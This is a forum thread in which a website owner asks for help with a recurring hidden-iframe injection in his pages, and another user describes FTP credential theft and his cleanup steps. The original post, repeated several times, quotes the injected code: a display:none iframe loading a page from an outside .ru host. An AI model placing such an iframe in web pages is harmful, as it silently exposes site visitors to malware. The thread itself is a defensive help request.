IFRAME Virus code Injection : Problem
-
Hi, On my website a virus is injecting IFRAME Virus code. I tried to replace that infected files with the original one, but that virus again injected the code. I also tried changing FTP and Control Panel Passwords. Still the virus has infected the files. I have also checked my pc for viruses by scanning using Antivirus with updated database. Bust still this virus has managed to infect my pages. I have also gone through the log files of domain. But it doesn’t help me. The virus injects following type of code in default.asp and index.htm files. e.g.
<body>
<div style="display:none">
<iframe src="http://medical-static-center.ru:8080/index.php" width=649 height=958 ></iframe>
</div>
<div style="display:none"></div><div style="display:none"></div>
<div style="display:none"></div><div style="display:none"></div>
<div style="display:none"></div><div style="display:none"></div>The source (src="") of iframe varies each time of infection. It puts the code immediately after <body> tag. Please help me. How to stops this virus from infecting my web pages?
Kiran Sajanikar
-
Hi, On my website a virus is injecting IFRAME Virus code. I tried to replace that infected files with the original one, but that virus again injected the code. I also tried changing FTP and Control Panel Passwords. Still the virus has infected the files. I have also checked my pc for viruses by scanning using Antivirus with updated database. Bust still this virus has managed to infect my pages. I have also gone through the log files of domain. But it doesn’t help me. The virus injects following type of code in default.asp and index.htm files. e.g.
<body>
<div style="display:none">
<iframe src="http://medical-static-center.ru:8080/index.php" width=649 height=958 ></iframe>
</div>
<div style="display:none"></div><div style="display:none"></div>
<div style="display:none"></div><div style="display:none"></div>
<div style="display:none"></div><div style="display:none"></div>The source (src="") of iframe varies each time of infection. It puts the code immediately after <body> tag. Please help me. How to stops this virus from infecting my web pages?
Kiran Sajanikar
Kiran S. S. wrote:
How to stops this virus from infecting my web pages?
Did your Antivirus software identify what virus you have on your PC. Perhaps you need to check the AV web sites for similar problems. Try Google searches for the URI that is being injected. Are you absolutely certain this is a virus rather than a bug in your code?
-
Kiran S. S. wrote:
How to stops this virus from infecting my web pages?
Did your Antivirus software identify what virus you have on your PC. Perhaps you need to check the AV web sites for similar problems. Try Google searches for the URI that is being injected. Are you absolutely certain this is a virus rather than a bug in your code?
-
I am not sure about that virus is present in my pc. Because my localhost server is not being infected. Only my remote files are get infected. Some kind of robotic software (May be virus) is injecting this code in my website.
Kiran Sajanikar
-
Hi, On my website a virus is injecting IFRAME Virus code. I tried to replace that infected files with the original one, but that virus again injected the code. I also tried changing FTP and Control Panel Passwords. Still the virus has infected the files. I have also checked my pc for viruses by scanning using Antivirus with updated database. Bust still this virus has managed to infect my pages. I have also gone through the log files of domain. But it doesn’t help me. The virus injects following type of code in default.asp and index.htm files. e.g.
<body>
<div style="display:none">
<iframe src="http://medical-static-center.ru:8080/index.php" width=649 height=958 ></iframe>
</div>
<div style="display:none"></div><div style="display:none"></div>
<div style="display:none"></div><div style="display:none"></div>
<div style="display:none"></div><div style="display:none"></div>The source (src="") of iframe varies each time of infection. It puts the code immediately after <body> tag. Please help me. How to stops this virus from infecting my web pages?
Kiran Sajanikar
Hey Kiran ! I have the same issue... and I found some data about it. This virus was supposed to infect machines and stole FTP credentials from your ftp client. But instead of that (at least at my case) it is listening for the traffic flow, and gets your credentials when you make a connection. Once the user and password were stoled, I found regular connections from foreing IPs. So for now, I did this: - remove manualy the iframes in your computer. - Upload the files - Change the password and don't use it until you clean this virus. I couldn't find the name of this virus yet, if you do, please, tell me ! Some tips: - I have nod32, and it found nothing in my PC. - Panda security (web scann) can't find nothing either. - When people with AVG and Avast try to go to an infected page, their AV gives them a message about the threat. I hope it helps you a bit. Regards. Edgar